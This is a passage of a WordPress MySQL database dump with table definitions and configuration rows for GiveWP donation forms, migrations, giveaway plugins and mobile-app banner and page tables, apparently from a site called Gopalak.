/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_give_donors` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `email` varchar(255) NOT NULL,
  `name` mediumtext NOT NULL,
  `purchase_value` mediumtext NOT NULL,
  `purchase_count` bigint(20) NOT NULL,
  `payment_ids` longtext NOT NULL,
  `date_created` datetime NOT NULL,
  `token` varchar(255) NOT NULL,
  `verify_key` varchar(255) NOT NULL,
  `verify_throttle` datetime NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `email` (`email`),
  KEY `user` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_give_donors`
--

LOCK TABLES `wp_give_donors` WRITE;
/*!40000 ALTER TABLE `wp_give_donors` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_give_donors` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_give_formmeta`
--

DROP TABLE IF EXISTS `wp_give_formmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_give_formmeta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `form_id` bigint(20) NOT NULL,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `form_id` (`form_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=57 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_give_formmeta`
--

LOCK TABLES `wp_give_formmeta` WRITE;
/*!40000 ALTER TABLE `wp_give_formmeta` DISABLE KEYS */;
INSERT INTO `wp_give_formmeta` VALUES (1,1774,'_give_onboarding_default_form','1'),(2,1774,'_give_levels_minimum_amount','10'),(3,1774,'_give_levels_maximim_amount','250'),(4,1774,'_give_form_template','sequoia'),(5,1774,'_give_form_status','open'),(6,1774,'_give_sequoia_form_template_settings','a:5:{s:12:\"introduction\";a:6:{s:7:\"enabled\";s:7:\"enabled\";s:8:\"headline\";s:17:\"Support Our Cause\";s:11:\"description\";s:104:\"Help our organization by donating today! All donations go directly to making a difference for our cause.\";s:5:\"image\";s:99:\"https://gopalak.in/wp-content/plugins/give/assets/dist/images/onboarding-preview-form-image.min.jpg\";s:13:\"primary_color\";s:7:\"#4fa651\";s:12:\"donate_label\";s:10:\"Donate Now\";}s:14:\"payment_amount\";a:3:{s:12:\"header_label\";s:13:\"Choose Amount\";s:7:\"content\";s:128:\"How much would you like to donate? As a contributor to Gopalak we make sure your donation goes directly to supporting our cause.\";s:10:\"next_label\";s:8:\"Continue\";}s:17:\"visual_appearance\";a:3:{s:16:\"decimals_enabled\";s:8:\"disabled\";s:13:\"primary_color\";s:7:\"#28C77B\";s:12:\"google-fonts\";s:7:\"enabled\";}s:19:\"payment_information\";a:7:{s:12:\"header_label\";s:20:\"Add Your Information\";s:8:\"headline\";s:19:\"Who\'s giving today?\";s:11:\"description\";s:49:\"We’ll never share this information with anyone.\";s:24:\"donation_summary_enabled\";s:7:\"enabled\";s:24:\"donation_summary_heading\";s:35:\"Here\'s what you\'re about to donate:\";s:25:\"donation_summary_location\";s:32:\"give_donation_form_before_submit\";i:0;a:7:{s:2:\"id\";s:14:\"checkout_label\";s:4:\"name\";s:13:\"Submit Button\";s:4:\"desc\";s:43:\"The button label for completing a donation.\";s:4:\"type\";s:11:\"text_medium\";s:10:\"attributes\";a:1:{s:11:\"placeholder\";s:10:\"Donate Now\";}s:7:\"default\";s:10:\"Donate Now\";s:18:\"mapToLegacySetting\";s:20:\"_give_checkout_label\";}}s:9:\"thank-you\";a:6:{s:5:\"image\";s:0:\"\";s:8:\"headline\";s:22:\"A great big thank you!\";s:11:\"description\";s:143:\"{name}, your contribution means a lot and will be put to good use in making a difference. We’ve sent your donation receipt to {donor_email}. \";s:7:\"sharing\";s:7:\"enabled\";s:19:\"sharing_instruction\";s:77:\"Help spread the word by sharing your support with your friends and followers!\";s:15:\"twitter_message\";s:38:\"I just gave to this cause. Who\'s next?\";}}'),(7,1774,'_give_checkout_label','Donate Now'),(8,1774,'_give_display_style','buttons'),(9,1774,'_give_payment_display','button'),(10,1774,'_give_form_floating_labels','disabled'),(11,1774,'_give_reveal_label','Donate Now'),(12,1774,'_give_display_content','disabled'),(13,1774,'_give_content_placement',''),(14,1774,'_give_form_content',''),(15,1774,'_give_price_option','multi'),(16,1774,'_give_set_price','1'),(17,1774,'_give_custom_amount','enabled'),(18,1774,'_give_donation_levels','a:5:{i:0;a:2:{s:8:\"_give_id\";a:1:{s:8:\"level_id\";s:1:\"0\";}s:12:\"_give_amount\";s:9:\"10.000000\";}i:1;a:2:{s:8:\"_give_id\";a:1:{s:8:\"level_id\";s:1:\"1\";}s:12:\"_give_amount\";s:9:\"25.000000\";}i:2;a:2:{s:8:\"_give_id\";a:1:{s:8:\"level_id\";s:1:\"2\";}s:12:\"_give_amount\";s:9:\"50.000000\";}i:3;a:3:{s:8:\"_give_id\";a:1:{s:8:\"level_id\";s:1:\"3\";}s:12:\"_give_amount\";s:10:\"100.000000\";s:13:\"_give_default\";s:7:\"default\";}i:4;a:2:{s:8:\"_give_id\";a:1:{s:8:\"level_id\";s:1:\"5\";}s:12:\"_give_amount\";s:10:\"250.000000\";}}'),(19,1774,'_give_default_gateway','global'),(20,1774,'_give_name_title_prefix','global'),(21,1774,'_give_title_prefixes',''),(22,1774,'_give_company_field','global'),(23,1774,'_give_anonymous_donation','global'),(24,1774,'_give_donor_comment','global'),(25,1774,'_give_logged_in_only','enabled'),(26,1774,'_give_show_register_form','none'),(27,1774,'_give_goal_option','disabled'),(28,1774,'_give_goal_format','amount'),(29,1774,'_give_set_goal','10000'),(30,1774,'_give_number_of_donor_goal','100'),(31,1774,'_give_goal_color','#4fa651'),(32,1774,'_give_close_form_when_goal_achieved','disabled'),(33,1774,'_give_form_goal_achieved_message','Thank you to all our donors, we have met our fundraising goal.'),(34,1774,'_give_terms_option','global'),(35,1774,'_give_agree_label','Agree to terms?'),(36,1774,'_give_agree_text','The terms can be customized in the donation form settings.'),(37,1774,'give_stripe_per_form_accounts','disabled'),(38,1774,'_give_default_stripe_account',''),(39,1774,'_give_email_options','global'),(40,1774,'_give_email_template','default'),(41,1774,'_give_email_logo',''),(42,1774,'_give_from_name','Gopalak'),(43,1774,'_give_from_email','mango@homedirect.in'),(44,1774,'_give_new-donation_notification','global'),(45,1774,'_give_new-donation_email_subject','New Donation - #{payment_id}'),(46,1774,'_give_new-donation_email_header','New Donation!'),(47,1774,'_give_new-donation_email_message','Hi there,\n\nThis email is to inform you that a new donation has been made on your website: {site_url}.\n\n<strong>Donor:</strong> {name}\n<strong>Donation:</strong> {donation}\n<strong>Amount:</strong> {amount}\n<strong>Payment Method:</strong> {payment_method}\n\nThank you,\n\n{sitename}\n'),(48,1774,'_give_new-donation_email_content_type','text/html'),(49,1774,'_give_new-donation_recipient','a:1:{s:5:\"email\";s:19:\"mango@homedirect.in\";}'),(50,1774,'_give_donation-receipt_notification','global'),(51,1774,'_give_donation-receipt_email_subject','Donation Receipt'),(52,1774,'_give_donation-receipt_email_header','Donation Receipt'),(53,1774,'_give_donation-receipt_email_mesage','Dear {name},\n\nThank you for your donation. Your generosity is appreciated! Here are the details of your donation:\n\n<strong>Donor:</strong> {fullname}\n<strong>Donation:</strong> {donation}\n<strong>Donation Date:</strong> {date}\n<strong>Amount:</strong> {amount}\n<strong>Payment Method:</strong> {payment_method}\n<strong>Payment ID:</strong> {payment_id}\n\n{receipt_link}\n\n\n\nSincerely,\n{sitename}\n'),(54,1774,'_give_donation-receipt_email_content_type','text/html'),(55,1774,'_give_form_goal_progress','-1'),(56,1774,'_give_offline_checkout_notes','<em>You can customize instructions in the forms settings.</em><br /><br /><strong>Please make checks payable to \"{sitename}\".</strong><br /><br />Your donation is greatly appreciated!');
/*!40000 ALTER TABLE `wp_give_formmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_give_log`
--

DROP TABLE IF EXISTS `wp_give_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_give_log` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `log_type` varchar(16) NOT NULL,
  `data` text NOT NULL,
  `category` varchar(64) NOT NULL,
  `source` varchar(64) NOT NULL,
  `date` datetime NOT NULL,
  PRIMARY KEY (`id`),
  KEY `log_type` (`log_type`),
  KEY `category` (`category`),
  KEY `source` (`source`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_give_log`
--

LOCK TABLES `wp_give_log` WRITE;
/*!40000 ALTER TABLE `wp_give_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_give_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_give_migrations`
--

DROP TABLE IF EXISTS `wp_give_migrations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_give_migrations` (
  `id` varchar(180) NOT NULL,
  `status` varchar(16) NOT NULL,
  `error` text DEFAULT NULL,
  `last_run` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_give_migrations`
--

LOCK TABLES `wp_give_migrations` WRITE;
/*!40000 ALTER TABLE `wp_give_migrations` DISABLE KEYS */;
INSERT INTO `wp_give_migrations` VALUES ('add-missing-transaction-id-for-uncompleted-stripe-donations','success','','2022-10-14 12:30:34'),('add-statement-descriptor-to-stripe-accounts','success','','2022-10-14 12:30:34'),('complete-removed-legacy-log-migration','success','','2022-10-14 12:30:34'),('create_migrations_table','success','','2022-10-14 12:30:34'),('create_new_log_table','success','','2022-10-14 12:30:34'),('create_revenue_table','success','','2022-10-14 12:30:34'),('create_subscription_tables','success','','2022-10-14 12:30:34'),('delete_old_log_tables','success','','2022-10-14 12:30:34'),('migrate_completed_migrations','success','','2022-10-14 12:30:34'),('remove_revenue_foreign_keys','success','','2022-10-14 12:30:34'),('remove_sensitive_logs','success','','2022-10-14 12:30:34'),('remove-log-with-card-info','success','','2022-10-14 12:30:34'),('remove-paypal-ipn-verification-setting','success','','2022-10-14 12:30:34'),('set_paypal_standard_id_to_paypal_from_paypal_standard','success','','2022-10-14 12:30:34'),('set-form-donation-levels-to-strings','success','','2022-10-14 12:30:34');
/*!40000 ALTER TABLE `wp_give_migrations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_give_revenue`
--

DROP TABLE IF EXISTS `wp_give_revenue`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_give_revenue` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `donation_id` bigint(20) unsigned NOT NULL,
  `form_id` bigint(20) unsigned NOT NULL,
  `amount` int(10) unsigned NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_give_revenue`
--

LOCK TABLES `wp_give_revenue` WRITE;
/*!40000 ALTER TABLE `wp_give_revenue` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_give_revenue` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_give_sequential_ordering`
--

DROP TABLE IF EXISTS `wp_give_sequential_ordering`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_give_sequential_ordering` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `payment_id` bigint(20) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_give_sequential_ordering`
--

LOCK TABLES `wp_give_sequential_ordering` WRITE;
/*!40000 ALTER TABLE `wp_give_sequential_ordering` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_give_sequential_ordering` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_give_sessions`
--

DROP TABLE IF EXISTS `wp_give_sessions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_give_sessions` (
  `session_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `session_key` char(32) NOT NULL,
  `session_value` longtext NOT NULL,
  `session_expiry` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`session_key`),
  UNIQUE KEY `session_id` (`session_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_give_sessions`
--

LOCK TABLES `wp_give_sessions` WRITE;
/*!40000 ALTER TABLE `wp_give_sessions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_give_sessions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_give_subscriptionmeta`
--

DROP TABLE IF EXISTS `wp_give_subscriptionmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_give_subscriptionmeta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `subscription_id` bigint(20) NOT NULL,
  `meta_key` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `meta_value` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `subscription_id` (`subscription_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_give_subscriptionmeta`
--

LOCK TABLES `wp_give_subscriptionmeta` WRITE;
/*!40000 ALTER TABLE `wp_give_subscriptionmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_give_subscriptionmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_give_subscriptions`
--

DROP TABLE IF EXISTS `wp_give_subscriptions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_give_subscriptions` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `customer_id` bigint(20) NOT NULL,
  `period` varchar(20) NOT NULL,
  `frequency` bigint(20) NOT NULL DEFAULT 1,
  `initial_amount` decimal(18,10) NOT NULL,
  `recurring_amount` decimal(18,10) NOT NULL,
  `recurring_fee_amount` decimal(18,10) NOT NULL,
  `bill_times` bigint(20) NOT NULL,
  `transaction_id` varchar(60) NOT NULL,
  `parent_payment_id` bigint(20) NOT NULL,
  `product_id` bigint(20) NOT NULL,
  `created` datetime NOT NULL,
  `expiration` datetime NOT NULL,
  `status` varchar(20) NOT NULL,
  `profile_id` varchar(60) NOT NULL,
  `notes` longtext NOT NULL,
  PRIMARY KEY (`id`),
  KEY `profile_id` (`profile_id`),
  KEY `customer` (`customer_id`),
  KEY `transaction` (`transaction_id`),
  KEY `customer_and_status` (`customer_id`,`status`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_give_subscriptions`
--

LOCK TABLES `wp_give_subscriptions` WRITE;
/*!40000 ALTER TABLE `wp_give_subscriptions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_give_subscriptions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_giveasap_actions`
--

DROP TABLE IF EXISTS `wp_giveasap_actions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_giveasap_actions` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `subscriber_id` bigint(20) NOT NULL,
  `giveaway_id` bigint(20) NOT NULL,
  `instance` bigint(20) NOT NULL,
  `entries` bigint(20) NOT NULL DEFAULT 1,
  `action` longtext NOT NULL,
  `status` varchar(20) NOT NULL DEFAULT 'invalid',
  `data` longtext DEFAULT NULL,
  `datetime` datetime DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_giveasap_actions`
--

LOCK TABLES `wp_giveasap_actions` WRITE;
/*!40000 ALTER TABLE `wp_giveasap_actions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_giveasap_actions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_giveasap_entries`
--

DROP TABLE IF EXISTS `wp_giveasap_entries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_giveasap_entries` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) NOT NULL,
  `email` longtext NOT NULL,
  `entries` bigint(20) NOT NULL DEFAULT 1,
  `ref_id` varchar(32) DEFAULT NULL,
  `active` tinyint(4) NOT NULL DEFAULT 0,
  `status` varchar(20) NOT NULL DEFAULT 'active',
  `date` datetime DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_giveasap_entries`
--

LOCK TABLES `wp_giveasap_entries` WRITE;
/*!40000 ALTER TABLE `wp_giveasap_entries` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_giveasap_entries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_giveasap_meta`
--

DROP TABLE IF EXISTS `wp_giveasap_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_giveasap_meta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `giveasap_id` bigint(20) NOT NULL,
  `meta_key` varchar(191) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `giveasap_id` (`giveasap_id`),
  KEY `meta_key` (`meta_key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_giveasap_meta`
--

LOCK TABLES `wp_giveasap_meta` WRITE;
/*!40000 ALTER TABLE `wp_giveasap_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_giveasap_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_links`
--

DROP TABLE IF EXISTS `wp_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
  `link_rating` int(11) NOT NULL DEFAULT 0,
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_links`
--

LOCK TABLES `wp_links` WRITE;
/*!40000 ALTER TABLE `wp_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_mab_banner`
--

DROP TABLE IF EXISTS `wp_mab_banner`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_mab_banner` (
  `banner_id` int(10) NOT NULL AUTO_INCREMENT,
  `name` varchar(40) NOT NULL,
  `image_width` int(3) NOT NULL,
  `image_height` int(3) NOT NULL,
  `status` tinyint(1) NOT NULL,
  `banner_limit` int(10) NOT NULL,
  PRIMARY KEY (`banner_id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_mab_banner`
--

LOCK TABLES `wp_mab_banner` WRITE;
/*!40000 ALTER TABLE `wp_mab_banner` DISABLE KEYS */;
INSERT INTO `wp_mab_banner` VALUES (1,'',0,0,0,0),(2,'',0,0,0,0);
/*!40000 ALTER TABLE `wp_mab_banner` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_mab_banner_image`
--

DROP TABLE IF EXISTS `wp_mab_banner_image`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_mab_banner_image` (
  `banner_image_id` int(10) NOT NULL AUTO_INCREMENT,
  `banner_id` int(10) NOT NULL,
  `banner_title` varchar(255) NOT NULL,
  `link_type` tinyint(1) NOT NULL,
  `link_to` int(10) NOT NULL,
  `image` varchar(255) NOT NULL,
  `sort_order` int(3) NOT NULL DEFAULT 0,
  PRIMARY KEY (`banner_image_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_mab_banner_image`
--

LOCK TABLES `wp_mab_banner_image` WRITE;
/*!40000 ALTER TABLE `wp_mab_banner_image` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_mab_banner_image` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_mab_cms_page_data`
--

DROP TABLE IF EXISTS `wp_mab_cms_page_data`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_mab_cms_page_data` (
  `cms_id` int(10) NOT NULL AUTO_INCREMENT,
  `page_title` varchar(255) NOT NULL,
  `link_to` int(10) NOT NULL,
  `status` tinyint(2) NOT NULL,
  `sort_order` int(3) NOT NULL DEFAULT 0,
  `date_added` datetime NOT NULL,
  `date_modified` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  PRIMARY KEY (`cms_id`)
) ENGINE=InnoDB AUTO_INCREMENT=22 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_mab_cms_page_data`
--

LOCK TABLES `wp_mab_cms_page_data` WRITE;
/*!40000 ALTER TABLE `wp_mab_cms_page_data` DISABLE KEYS */;
INSERT INTO `wp_mab_cms_page_data` VALUES (1,'About Us',560,1,0,'2022-02-09 10:49:35','2022-02-10 09:47:23'),(2,'Cart',9,0,0,'2022-02-09 10:49:35','2022-02-09 10:49:35'),(3,'Checkout',10,0,0,'2022-02-09 10:49:35','2022-02-09 10:49:35'),(4,'Contest',902,0,0,'2022-02-09 10:49:35','2022-02-09 10:49:35'),(5,'Home',403,1,1,'2022-02-09 10:49:35','2022-02-10 09:47:23'),(6,'Mango Calendar',682,0,0,'2022-02-09 10:49:35','2022-02-09 10:49:35'),(7,'Mango Recipes',745,0,0,'2022-02-09 10:49:35','2022-02-09 10:49:35'),(8,'Pricing Policy',562,0,0,'2022-02-09 10:49:35','2022-02-09 10:49:35'),(9,'Privacy Policy',566,0,0,'2022-02-09 10:49:35','2022-02-09 10:49:35'),(10,'Refunds/Cancellation',568,0,0,'2022-02-09 10:49:35','2022-02-09 10:49:35'),(11,'Shop',8,1,2,'2022-02-09 10:49:35','2022-02-10 09:47:23'),(12,'Store Manager',633,0,0,'2022-02-09 10:49:35','2022-02-09 10:49:35'),(13,'Terms And Conditions',564,0,0,'2022-02-09 10:49:35','2022-02-09 10:49:35'),(14,'Upload form',716,0,0,'2022-02-09 10:49:35','2022-02-09 10:49:35'),(15,'User Login',720,0,0,'2022-02-09 10:49:35','2022-02-09 10:49:35'),(16,'Vendor Dashboard',5,0,0,'2022-02-09 10:49:35','2022-02-09 10:49:35'),(17,'Vendor Membership',635,0,0,'2022-02-09 10:49:35','2022-02-09 10:49:35'),(18,'Vendor Registration',521,1,3,'2022-02-09 10:49:35','2022-02-10 09:47:23'),(19,'Vendor Registration',636,0,0,'2022-02-09 10:49:35','2022-02-09 10:49:35'),(20,'Wishlist',476,0,0,'2022-02-09 10:49:35','2022-02-09 10:49:35'),(21,'WP File download search',645,0,0,'2022-02-09 10:49:35','2022-02-09 10:49:35');
/*!40000 ALTER TABLE `wp_mab_cms_page_data` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_mab_fcm_details`
--

DROP TABLE IF EXISTS `wp_mab_fcm_details`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_mab_fcm_details` (
  `fcm_details_id` int(10) NOT NULL AUTO_INCREMENT,
  `email_id` varchar(255) DEFAULT NULL,
  `order_id` int(10) DEFAULT NULL,
  `cart` text DEFAULT NULL,
  `fcm_id` text NOT NULL,
  `notification_sent_status` int(2) DEFAULT NULL,
  `last_order_status` int(11) NOT NULL DEFAULT 0,
  `date_add` datetime NOT NULL,
  `date_upd` datetime NOT NULL,
  PRIMARY KEY (`fcm_details_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_mab_fcm_details`
--

LOCK TABLES `wp_mab_fcm_details` WRITE;
/*!40000 ALTER TABLE `wp_mab_fcm_details` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_mab_fcm_details` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_mab_mobileapp_banners`
--

DROP TABLE IF EXISTS `wp_mab_mobileapp_banners`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_mab_mobileapp_banners` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `id_component` int(11) NOT NULL,
  `id_banner_type` int(11) NOT NULL,
  `countdown` varchar(200) DEFAULT NULL,
  `product_id` int(10) DEFAULT NULL,
  `category_id` int(10) DEFAULT NULL,
  `redirect_activity` varchar(100) DEFAULT NULL,
  `image_url` longtext DEFAULT NULL,
  `product_name` varchar(200) DEFAULT NULL,
  `image_contentMode` varchar(200) NOT NULL,
  `banner_heading` varchar(200) DEFAULT NULL,
  `background_color` varchar(11) DEFAULT NULL,
  `is_enabled_background_color` int(10) NOT NULL DEFAULT 1,
  `text_color` varchar(11) DEFAULT NULL,
  `banner_custom_background_color` varchar(11) DEFAULT NULL,
  `inset_top` varchar(11) DEFAULT NULL,
  `inset_bottom` varchar(11) DEFAULT NULL,
  `inset_left` varchar(11) DEFAULT NULL,
  `inset_right` varchar(11) DEFAULT NULL,
  `banner_width` varchar(11) DEFAULT NULL,
  `banner_height` varchar(11) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=9 DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_mab_mobileapp_banners`
--

LOCK TABLES `wp_mab_mobileapp_banners` WRITE;
/*!40000 ALTER TABLE `wp_mab_mobileapp_banners` DISABLE KEYS */;
